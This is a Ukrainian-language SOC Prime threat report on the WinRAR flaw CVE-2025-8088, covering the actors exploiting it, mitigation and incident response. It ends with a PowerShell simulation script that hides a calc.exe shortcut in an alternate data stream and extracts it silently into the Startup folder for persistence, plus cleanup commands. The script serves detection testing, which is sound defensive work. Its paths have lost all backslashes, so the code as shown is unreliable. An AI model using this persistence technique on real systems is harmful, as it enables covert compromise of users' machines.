SOC Prime Bias: Критичний

28 Jan 2026 13:07 UTC

CVE-2025-8088: Різноманітні зловмисники експлуатують критичну вразливість WinRAR

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
CVE-2025-8088: Різноманітні зловмисники експлуатують критичну вразливість WinRAR
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Група загрозної розвідки Google повідомляє про широке використання вразливості CVE-2025-8088, яка представляє собою високосерйозну уразливість WinRAR для обходу шляху. Зловмисники використовують її для розміщення шкідливих файлів у папку автозавантаження Windows для отримання стійкості. Як групи, які спонсоруються державою, так і фінансово мотивовані групи використовують цю експлуатацію для доставки RAT, завантажувачів та подальших захищених навантажень. У звіті надано індикатори, а також керівництво щодо виявлення та пом’якшення наслідків.

Розслідування

Дослідники пов’язали кілька акторів — UNC4895, APT44, Turla, а також групу з КНР — з архівами RAR, що застосовують альтернативні потоки даних (ADS) для розміщення файлів LNK, HTA або BAT у папку автозавантаження. Деякі архіви містили керуючі файли LNK, які запускають HTA або BAT під час входу в систему. Набори шкідливих програм, які спостерігалися, включають NESTPACKER, POISONIVY, XWorm і AsyncRAT. Спільна інфраструктура та повторно використаний код експлойта з’явилися в кампаніях, спрямованих на Україну та інші регіони.

Пом’якшення

Оновіть WinRAR до версії 7.13+ та змусьте список дозволених додатків. Зменште вплив ADS, де це можливо, та контролюйте папку автозавантаження на наявність нових файлів LNK, HTA, BAT або скриптів. Застосуйте контроль безпеки Google Safe Browsing та електронної пошти, щоб зупинити небезпечні архіви на ранніх етапах.

Реагування

Обмежте створення файлів шляху автозавантаження, пов’язаних з витягуванням RAR, особливо ярликів і скриптів. Корелюйте попередження з відомими іменами файлів і хешами, ставте під карантин уражені хости, підтверджуйте тип шкідливого ПЗ та усувайте стійкість до автозавантаження під час реагування на інциденти.

Потік атаки

Виконання імітації

Попередня умова: Телеметрія та перевірка передпольотної бази повинні бути успішними.

Мотив: Цей розділ описує точне виконання техніки супротивника (TTP), розробленої для активації правила виявлення. Команди та наратив повинні прямо відображати виявлені TTP та націлені на генерування точних даних телеметрії, очікуваної логікою виявлення.

  • Наратив атаки та команди:
    Зловмисник створює шкідливий архів RAR, який містить ярлик Windows (shkidliviy.lnk) як альтернативний потік даних, прикріплений до нешкідливого на вигляд PDF (незазначений.pdf). Використовуючи CVE‑2025‑8088, зловмисник знає, що WinRAR розпакує ADS безпосередньо в цільовий шлях, не обробляючи ім’я потоку. Архів доставляється до машини жертви (наприклад, через фішинг). Потім зловмисник запускає WinRAR в тихому режимі, щоб витягти корисне навантаження прямо в папку автозавантаження поточного користувача, досягаючи стійкості.

    1. Створити шкідливе завантаження LNK (ярлик, який запускає cmd.exe /c calc.exe).
    2. Прикрепіть LNK як ADS до незазначений.pdf всередині RAR.
    3. Доставити RAR жертві.
    4. Виконати витяг WinRAR до каталогу автозавантаження.
  • Сценарій регресійного тесту:

    # --------------------------------------------------------------
    # Сценарій PowerShell для імітації стійкого LNK-ADS під CVE-2025-8088
    # --------------------------------------------------------------
    
    # 1. Перемінні
    $tempDir      = "$env:TEMPLNK_ADS_Test"
    $pdfPath      = "$tempDirinnocuous.pdf"
    $lnkPath      = "$tempDirmalicious.lnk"
    $rarPath      = "$tempDirmalicious.rar"
    $startupPath  = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartup"
    
    # Забезпечити чисте робоче середовище
    Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue
    New-Item -ItemType Directory -Path $tempDir | Out-Null
    
    # 2. Створити фіктивний PDF (порожній файл працює для демонстрації ADS)
    New-Item -ItemType File -Path $pdfPath | Out-Null
    
    # 3. Створити шкідливий LNK, який показує на калькулятор
    $ws = New-Object -ComObject WScript.Shell
    $shortcut = $ws.CreateShortcut($lnkPath)
    $shortcut.TargetPath = "calc.exe"
    $shortcut.WindowStyle = 1
    $shortcut.Save()
    
    # 4. Упакуйте PDF і прикріпіть LNK як ADS за допомогою WinRAR CLI
    #    Синтаксис створює ADS з назвою "malicious.lnk", прикріпленою до PDF.
    & "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk"
    
    # 5. Витягніть RAR безпосередньо в папку автозавантаження (тихий режим)
    & "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath
    
    # 6. Перевірте, що LNK тепер є в автозавантаженні (буде видно як звичайний .lnk)
    $extractedLnk = Join-Path $startupPath "malicious.lnk"
    if (Test-Path $extractedLnk) {
        Write-Host "[+] Зловмисний ярлик розгорнуто до автозавантаження: $extractedLnk"
    } else {
        Write-Error "[-] Ярлик не знайдено – витяг, можливо, провалився."
    }
    
    # --------------------------------------------------------------
    # Кінець сценарію
    # --------------------------------------------------------------
  • Команди очищення:

    # Видалити шкідливий ярлик з автозавантаження
    $lnk = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk"
    if (Test-Path $lnk) { Remove-Item -Force $lnk }
    
    # Видалити тимчасові файли та каталоги
    $temp = "$env:TEMPLNK_ADS_Test"
    if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }

Кінець звіту